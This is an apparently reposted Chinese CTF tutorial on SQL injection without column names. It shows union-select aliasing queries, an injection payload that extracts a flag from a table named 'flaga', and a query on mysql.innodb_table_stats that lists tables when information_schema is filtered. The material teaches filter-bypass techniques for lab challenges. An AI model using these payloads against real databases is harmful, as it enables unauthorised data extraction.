您的位置:首页 > 财经 > 产业 > CTF常用sql注入(三)无列名注入

CTF常用sql注入(三)无列名注入

2024/12/23 5:15:02 来源:https://blog.csdn.net/2301_81040377/article/details/140189235  浏览:    关键词:CTF常用sql注入(三)无列名注入

0x06 无列名

适用于无法正确的查出结果,比如把information_schema给过滤了

join

联合

select * from users;

在这里插入图片描述

select 1,2,3 union select * from users;

在这里插入图片描述

列名被替换成了1,2,3,
我们再利用子查询和别名查

select `2` from (select 1,2,3 union select * from users)a;

在这里插入图片描述
继续加大难度,不用反引号

select b from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
同时查询多个列

select concat(b,0x7e,c) from (select 1 as a,2 as b,3 as c union select * from users)u;

在这里插入图片描述
已知表名为flaga

password=\&username=,username=(select a from (select 1,2 as a,6 union select * from flaga limit 1,1)u)#

在这里插入图片描述
成功

0x07 InnoDb引擎

也是针对or的过滤来查询表名

innodb_index_stats和innodb_table_stats表

例句,缺点就是只能查表,配合无列名查询一起食用

(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com